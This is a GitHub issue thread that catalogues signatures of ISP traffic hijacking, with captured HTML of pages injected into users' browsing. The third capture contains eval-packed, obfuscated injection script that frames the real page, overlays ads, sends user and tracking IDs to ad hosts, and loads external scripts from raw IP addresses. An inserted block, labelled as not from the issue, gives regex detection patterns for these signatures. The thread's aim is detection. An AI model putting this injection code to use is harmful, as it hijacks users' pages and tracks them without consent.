
Big collection of China Telecom traffic-hijacking signatures #1

Open
cssmagic opened this issue Dec 19, 2014 · 3 comments

Comments

@cssmagic · Member

If you notice traffic hijacking while browsing at home, please analyze the scene and add the signatures here.

Notes

  • When analyzing the scene, do not refresh; one refresh and it is gone.
  • Viewing the page source is useless, because it amounts to re-requesting the page and only yields the normal page source.
  • If you need to analyze the page structure, use the DOM inspector or a feature like "View Generated Source".
@cssmagic · Member, Author

Incident scene

<html>
<head>
<title><!-- empty --></title>
</head>
<body style="margin:0px;overflow-x:hidden;overflow-y:hidden;">
<div id="ad_id" class="ad-dialog" style="position: absolute;">...</div>
<iframe style="position:fixed;" src="{target-page-url}"></iframe>
</body>
</html>

Signature summary

  • The page title is empty.
  • The target page is wrapped in an <iframe> whose src is the target page URL.

@cssmagic · Member, Author

Incident scene

<html>
<head>
<title>{target-page-title}</title>
<script>
url = {a:"http://58.215.179.***/svr/flow/**",m:"http://www.jd.com/",s:"undefined"} //...
</script>
</head>
<body style="margin:0px;overflow-x:hidden;overflow-y:hidden;">
<div id="ad_id" class="ad-dialog" style="position: absolute;">
    <div>
        <iframe id="adframe" src="http://58.215.179.***/svr/flow/**"></iframe>
    </div>
</div>
<iframe style="position:fixed;" src="JavaScript:parent.goURLm()"></iframe>
</body>
</html>

Signature summary

This is an improved version of the case above; these thieves have gotten smarter and are trying to evade some hijack-detection tools.

  • The page title is the target page's title.
  • The target page is wrapped in an <iframe>, but its src is a javascript: pseudo-protocol URL. When the pseudo-protocol script runs, it returns a simplified HTML document that automatically redirects to the target page.
  • The page has a global variable url that supplies the ad URL and the target page URL.
  • Some external script resources loaded by the page (which may compromise the user's cookies and other private data) come from the aiyiqu.com domain.
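The signatures from the first two captures, turned into a static matcher that runs over the generated HTML (what a DOM inspector or "View Generated Source" gives you). This is an added example, not code from the issue; the sample documents and their hosts (target.example, ad.example) are constructed placeholders.

```javascript
// Added example (not from the issue): a static matcher for the hijack signatures
// listed in the first two captures. Sample hosts below are constructed placeholders.
const SIGNATURES = [
  // <title> with nothing but whitespace or an HTML comment inside (first capture)
  { id: 'empty-title',
    re: /<title>\s*(?:<!--[\s\S]*?-->)?\s*<\/title>/i },
  // position:fixed iframe whose src is the real page's http(s) URL (first capture)
  { id: 'fixed-iframe-wraps-target',
    re: /<iframe[^>]*position\s*:\s*fixed[^>]*src="https?:/i },
  // iframe src is a javascript: pseudo-URL that rebuilds the page (second capture)
  { id: 'javascript-pseudo-protocol-iframe',
    re: /<iframe[^>]*src="javascript:/i },
  // global url = {a:"<ad url>", m:"<target url>", ...} object (second capture)
  { id: 'global-url-object',
    re: /\burl\s*=\s*\{\s*a\s*:\s*"[^"]*"\s*,\s*m\s*:\s*"/i },
  // injected ad container present in both captures
  { id: 'ad-dialog-container',
    re: /<div[^>]*class="ad-dialog"/i },
];

// Return the ids of every signature that matches the captured (generated) HTML.
function hijackSignatures(html) {
  return SIGNATURES.filter(s => s.re.test(html)).map(s => s.id);
}

// Verdict: one of the two framing patterns plus the ad container.
// An empty title on its own is too weak to flag.
function looksHijacked(html) {
  const hits = hijackSignatures(html);
  const framed = hits.includes('fixed-iframe-wraps-target')
              || hits.includes('javascript-pseudo-protocol-iframe');
  return framed && hits.includes('ad-dialog-container');
}
// Constructed sample mirroring the first capture (placeholder URLs).
const SAMPLE_V1 = `<html><head><title><!-- empty --></title></head>
<body style="margin:0px;overflow-x:hidden;overflow-y:hidden;">
<div id="ad_id" class="ad-dialog" style="position: absolute;">...</div>
<iframe style="position:fixed;" src="http://target.example/page"></iframe>
</body></html>`;

// Constructed sample mirroring the second capture (placeholder ad host).
const SAMPLE_V2 = `<html><head><title>Target Page Title</title>
<script>url = {a:"http://ad.example/svr/flow/x",m:"http://target.example/",s:"undefined"}</script>
</head><body><div id="ad_id" class="ad-dialog" style="position: absolute;">
<div><iframe id="adframe" src="http://ad.example/svr/flow/x"></iframe></div></div>
<iframe style="position:fixed;" src="JavaScript:parent.goURLm()"></iframe></body></html>`;

// Constructed unmodified page for contrast.
const SAMPLE_CLEAN = '<html><head><title>Target Page Title</title></head><body><p>hi</p></body></html>';
```

Feed it the generated source of the suspect page rather than a fresh fetch, for the reason given in the notes above: re-requesting the page returns the clean document.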

@cssmagic · Member, Author

Incident scene

<head>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
    <style>
    @charset "utf-8";body, div, span, p, iframe,a{margin:0;padding:0;outline:none}.ad-dialog{position:absolute;z-index:998;padding:0px;font-size:12px;overflow:hidden;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;box-shadow:1px 2px 2px #999;-webkit-box-shadow:1px 2px 2px #999;-moz-box-shadow:1px 2px 2px #999}.ad-dialog .title{width:100%;height:25px;line-height:25px;text-align:left;text-indent:8px;font-size:12px;font-weight:bold;color:#FFF;background:#CCC;-webkit-border-top-left-radius:4px;-moz-border-top-left-radius:4px;border-top-left-radius:4px;-webkit-border-top-right-radius:4px;-moz-border-top-right-radius:4px;border-top-right-radius:4px}.ad-dialog .icon{position:absolute;top:0;right:0;margin-right:4px}.ad-dialog .icon a{width:20px;height:20px;margin:2px 0 0 2px;text-align:center;line-height:20px;float:left;display:inline-block;text-decoration:none;color:#FFF;font-family:Verdana, Geneva, sans-serif;font-weight:bold;font-size:15px;overflow:hidden}.ad-dialog .icon a:hover{color:#F00}.ad-dialog .icon a:hover span{border-color:#F00}.ad-dialog .icon a span{display:inline-block;margin:0px;padding:0;overflow:hidden;zoom:1}.ad-dialog .icon .icon-min span{height:8px;width:12px;margin:2px 3px;border-bottom:2px solid #FFF}.ad-dialog .icon .icon-max span{height:8px;width:8px;margin:4px 4px;border:2px solid #FFF}.ad-dialog .icon .icon-max span:hover{border:2px solid #F00}.ad-dialog .icon .icon-min span:hover{border-bottom:2px solid #F00}.ad-dialog .content{-webkit-border-bottom-left-radius:4px;-moz-border-bottom-left-radius:4px;border-bottom-left-radius:4px;-webkit-border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;border-bottom-right-radius:4px}.style0{-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;box-shadow:none}.style0 .title{background:#CCC;color:#333}.style0 .content{-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px}.style0 .icon a{color:#333}.style0 .icon .icon-min span{border-color:#333}.style0 
.icon .icon-max span{border-color:#333}.style1{border:1px solid #000}.style1 .title{background:#444}.style2{border:1px solid #0B4453}.style2 .title{background:#137893}.style3{border:1px solid #E91852}.style3 .title{background:#F27B9B}.style4{border:1px solid #BEA323}.style4 .title{background:#E6D479}.style5{border:1px solid #27AD85}.style5 .title{background:#58D9B3}.style6{border:1px solid #3E3564}.style6 .title{background:#5F529A}.style7{border:1px solid #DD6921}.style7 .title{background:#F9AA75}.style8{border:1px solid #285340}.style8 .title{background:#3F7F63}
    </style>
    <script>
    url={a:"http://120.27.28.39/yy/kd580087.html",m:"http://www.fang.com/ask/ask_10151218.html",s:"undefined"};var _iaui=true;var _xus="QUFPeEhWMlhzblNSaTcrNVd5VzU4UT09";var _xai="";var _xti="aXE3RGJtNWZJQ2JydWRCMzlRek02QT09";
    </script>
    <script>
    eval(function(p,a,c,k,e,r){e=function(c){return(c&lt;a?'':e(parseInt(c/a)))+((c=c%a)&gt;35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5 1W={\'1U\':\'0\',\'1K\':U,\'1B\':\'\',\'1d\':\'1q 1V\',\'1P\':{\'1M\':\'1L\',\'1G\':1z},\'2a\':\'1I\',\'1p\':\'\',\'1C\':{\'w\':1,\'h\':1},\'1E\':\'1u\',\'1w\':{\'1x\':U,\'1A\':{\'w\':0,\'h\':0},\'1d\':\'\'}};7 1f(){E="1H+/=";1O.2c=7(k){5 H="";5 P,z,A,T,X,N,C;5 i=0;k=17(k);1Q(i&lt;k.p){P=k.L(i++);z=k.L(i++);A=k.L(i++);T=P&gt;&gt;2;X=((P&amp;3)&lt;&lt;4)|(z&gt;&gt;4);N=((z&amp;15)&lt;&lt;2)|(A&gt;&gt;6);C=A&amp;K;8(18(z)){N=C=19}J 8(18(A)){C=19}H=H+E.M(T)+E.M(X)+E.M(N)+E.M(C)}e H};17=7(v){v=v.F(/\\r\\n/g,"\\n");5 f="";I(5 n=0;n&lt;v.p;n++){5 c=v.L(n);8(c&lt;R){f+=l.u(c)}J 8((c&gt;1X)&amp;&amp;(c&lt;1Y)){f+=l.u((c&gt;&gt;6)|1Z);f+=l.u((c&amp;K)|R)}J{f+=l.u((c&gt;&gt;12)|26);f+=l.u(((c&gt;&gt;6)&amp;K)|R);f+=l.u((c&amp;K)|R)}}e f}}5 27=28 1f();7 29(){5 1a=/[&amp;\\?]2e=/i;8(!1a.1o(1c.a)&amp;&amp;1r){e 1s}e U}7 1t(){5 j=1c.m;8(j.1e(j.p-1)=="/")j=j.1e(0,j.p-1);e"&lt;1n&gt;&lt;/1v&gt;&lt;1h&gt;10.1y.F(\\""+j+"\\");&lt;\\/1h&gt;&lt;\\/1n&gt;"};1i.1k=7(q,D){I(5 i 1m D){8(16 D[i]!=="1F"){q[i]=D[i]}J{q[i]=q[i]||{};1i.1k(q[i],D[i])}}e q};7 $(o){5 d=10;7 c(G){5 s=d.1J(\'*\'),c=[];I(5 x=0;x&lt;s.p;x++){5 a=s[x].V;8(a){s[x].V.W(G)+1?c.1b(s[x]):\'\'}};e c.p==1?c[0]:c};e o.W("#")+1?d.1N(o.B("#")[1].Y(/\\S+/)):o.W(".")+1?c(o.B(".")[1].Y(/\\S+/)[0]):\'\'};7 1R(s){10.1S(s)};7 1T(9,G){8(!9||!9.Z){e}5 t=9.Z.1g,a=t.F(/;\\s+/O,";").B(\';\'),c=[],b=G.F(/;\\s+/O,";");8(t){I(5 i 1m a){8(a[i]){5 20=21(a[i].B(\':\')[0]);8(!b.Y(22("/"+a[i].B(\':\')[0]+"/O"))){c.1b(a[i])}}};b=(c.23(\';\')+\';\')+b};9.Z.1g=b.F(/%24/O,\'%\')};7 25(9,11){5 1j={\'Q\':\'V\'},y=9.1l("Q"),14=y?\'Q\':1j[\'Q\'];y=9.1l(14);9.2b(14,y?y+\' 
\'+11:11)};13=16(13)==\'2d\'?7(1D){}:13;',62,139,'|||||var||function|if|obj|||||return|utftext||||desturl|input|String||||length|t_||||fromCharCode|string|||cs|chr2|chr3|split|enc4|s_|_keyStr|replace|str|output|for|else|63|charCodeAt|charAt|enc3|ig|chr1|class|128||enc1|false|className|indexOf|enc2|match|style|document|name||extCallback|cls||typeof|_utf8_encode|isNaN|64|regex|push|url|position|slice|Base64|cssText|script|Object|fixattr|extend|getAttribute|in|html|test|opentype|right|_iaui|true|goURLm|style0|head|mini|able|location|60|size|title|adsize|para|skincolor|object|time|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|doc|getElementsByTagName|istitle|close|type|getElementById|this|delay|while|out|writeln|css|id|down|adparam|127|2048|192|reg|RegExp|eval|join|px|addClass|224|_base64|new|initIsAddUserId|loadfirst|setAttribute|encode|undefined|_us'.split('|'),0,{}))
    </script>
    <title>北京新天地的小区楼盘怎么样-房天下问答</title>
</head>

<body style="margin:0px;overflow-x:hidden;overflow-y:hidden;">
    <iframe width="100%" height="100%" frameborder="no" style="position: fixed; display: block;" onload="" scrolling="auto" src="JavaScript:parent.goURLm()" id="ifrmain"></iframe>
    <script>
    eval(function(p,a,c,k,e,d){e=function(c){return(c&lt;a?"":e(parseInt(c/a)))+((c=c%a)&gt;35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('c=d(1){b(1.2.a.9(\'?\')&gt;0){1.2.a=1.2.a+"&amp;6="+1.4+"&amp;5="+1.3+"&amp;8="+1.7}f{1.2.a=1.2.a+"?6="+1.4+"&amp;5="+1.3+"&amp;8="+1.7};g(e)}',17,17,'|ad|url|adid|userid|_xai|_us|tid|_xti|indexOf||if|extCallback|function|true|else|setAdVisiable'.split('|'),0,{}))
    </script>
    <script>
    var ADwidth=0;var ADheight=0;var tmp_width=0;var tmp_height=0;var message={init:function(arg){var $t=this;var args={loadfirst:"ad",title:"-",istitle:false,mainsize:{w:'100%',h:'100%'},adsize:{w:300,h:180},position:"right down",delay:{type:'',time:3},opentype:"",mini:{able:true,size:{w:250,h:30},position:"left up"},skincolor:'style0'};$t.a=Object.extend(args,arg);$t.min_=0;var $t=this;loading(function(){$t.event();$t.animate();var param={url:url,userid:_xus,adid:_xai,tid:_xti};extCallback(param)});function loading(callback){$t.win();$t.max();$t.winchange();css($('#ifrmain'),"display:none;");css($('#ad_id'),"display:none;");if($t.a.loadfirst=="ad"){setTimeout(function(){css($('#ifrmain'),"display:block;")},1000);css($('#ad_id'),"display:block;");callback()}else if($t.a.loadfirst=="doc"){css($('#ifrmain'),"display:block;");$('#ifrmain').onload=function(){css($('#ad_id'),"display:block;");callback()}}}},win:function(){var $t=this;$('.tt_').innerHTML=$t.a.title;css($('.tt_'),"width:"+$t.a.adsize.w+"px;");addClass($('.ad_'),$t.a.skincolor);$t.a.istitle?css($('.tt_'),"display:block"):css($('.tt_'),"display:none")},min:function(){var $t=this;setTimeout(function(){$t.min_=1},500);css($('.min_'),"display:none");css($('.max_'),"display:block");var adIframe=document.getElementById("adframe");if(adIframe){adIframe.src=url.s}$t.position($t.a.mini.position,$t.a.mini.size)},position:function(dir,size){var $t=this,s=size,l,r,t,b,l1,r1,t1,b1;switch(dir){case"left down":l=2;t='';r='';b=2;break;case"left up":l=2;t=2;r='';b='';break;case"right down":l='';t='';r=2;b=2;break;case"right up":l='';t=2;r=2;b='';break;case"center":r='';b='';l=($t.screen().w-s.w)*0.5;t=($t.screen().h-s.h)*0.5;break;default:t=dir.split(" ")[0];l=dir.split(" ")[1];r='';b='';break};css($('.ad_'),"left:"+l+"px;top:"+t+"px;right:"+r+"px;bottom:"+b+"px;");ADwidth=s.w;ADheight=s.h;css($('#adframe'),"width:"+s.w+"px;height:"+s.h+"px;");css($('.tt_'),"width:"+s.w+"px;")},screen:function(){var 
$t=this,d=document,b=d.body,e=d.documentElement;return{w:e.clientWidth,h:Math.max(b.scrollTop,e.scrollTop)+/BackCompat/i.test(d.compatMode)?b.clientHeight:e.clientHeight}},close:function(){var a=$('.ad_');a.parentNode.removeChild(a)},max:function(){var $t=this;css($('.max_'),"display:none");css($('.min_'),"display:block");$t.min_=0;$t.position($t.a.position,$t.a.adsize);var adIframe=document.getElementById("adframe");if(adIframe){adIframe.src=url.a}$t.a.mini.able?'':css($('.min_'),'display:none;')},winchange:function(){var $t=this;setInterval(function(){if(self!=parent){try{var a=parent.document.getElementById("ad_id");a.parentNode.removeChild(a)}catch(e){}parent.document.getElementById("ifrmain").style.overflow="hidden"}},50)},animate:function(){var $t=this,i=0;if($t.a.delay.type=='min')setTimeout(function(){$t.min()},$t.a.delay.time*1000);if($t.a.delay.type=='close')setTimeout(function(){$t.close()},$t.a.delay.time*1000);if($t.a.opentype=='move'){$('.ad_').onmouseover=function(){if($t.min_==1){$t.max()}}}},event:function(){var $t=this;$('.close_').onclick=function(){$t.close()};$('.min_').onclick=function(){$t.min()};$('.max_').onclick=function(){$t.max()}}};message.init(adparam);var t;function v(){if(document.title!=''){clearTimeout(t);return};var doc;if(document.all){doc=document.frames["ifrmain"].document}else{doc=document.getElementById("ifrmain").contentDocument};document.title=doc?doc.title:"";t=setTimeout("v()",500)};v();function createADPage(){var html="&lt;iframe scrolling='no' frameborder='no' src='"+url.a+"' allowtransparency='true' id='adframe' class='ct_adframe'&gt;&lt;/iframe&gt;";$(".content").innerHTML=html;css($('#adframe'),"width:"+ADwidth+"px;height:"+ADheight+"px;")};function setAdVisiable(flag){if(flag){if($("#adframe")){}else{createADPage()}css($('#ad_id'),"display:block;")}else{css($('#ad_id'),"display:none;")}};
    </script>
    <script src="http://61.152.223.15:8080/js/jsstyle-yy.js"></script>
    <div id="nnn" style="width: 300px; height: 250px; position: absolute; top: 774px; left: 1618px;"><table width="100%" cellspacing="0" cellpadding="0" border="0" bgcolor="#ececec"><tbody><tr><td valign="middle" height="1"></td><td valign="middle" align="right" style=""></td></tr><tr><td height="250" colspan="2"><div onclick="closePushDiv()" style="position:absolute; right:10px; top:10px; cursor:pointer;"><span style="font-weight:bold; font-size:13px;">关闭</span></div><div style="position:relative;"><iframe width="300" height="250" frameborder="0" scrolling="no" name="page" allowtransparency="true" src="http://139.196.30.10/yuexing/yuexing20160602.html"></iframe></div></td></tr></tbody></table>
    </div>
</body>
